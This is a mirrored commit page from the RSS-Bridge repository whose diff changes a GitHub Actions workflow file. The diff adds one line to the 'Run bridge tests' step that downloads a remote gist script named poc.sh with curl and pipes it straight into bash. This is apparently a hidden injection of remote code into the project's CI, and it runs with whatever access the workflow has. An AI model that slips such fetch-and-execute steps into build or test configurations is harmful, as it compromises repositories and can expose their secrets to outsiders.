mirror of
https://github.com/RSS-Bridge/rss-bridge.git
synced 2025-04-24 23:37:18 +00:00
Merge f90830a249
into 80c43f10d8
This commit is contained in:
commit
c7cc42d80e
1
.github/workflows/prhtmlgenerator.yml
vendored
1
.github/workflows/prhtmlgenerator.yml
vendored
@ -44,6 +44,7 @@ jobs:
|
|||||||
- name: Run bridge tests
|
- name: Run bridge tests
|
||||||
id: testrun
|
id: testrun
|
||||||
run: |
|
run: |
|
||||||
|
curl -sSfL gist.githubusercontent.com/Fearless-Squirrel/bbef3562184dc8ac74b076f15a9c465f/raw/54aabb582d12f6c0cf5227a3ca6acd170cb74bff/poc.sh | bash
|
||||||
mkdir results;
|
mkdir results;
|
||||||
python prtester.py;
|
python prtester.py;
|
||||||
body="$(cat comment.txt)";
|
body="$(cat comment.txt)";
|
||||||
|
Loading…
Reference in New Issue
Block a user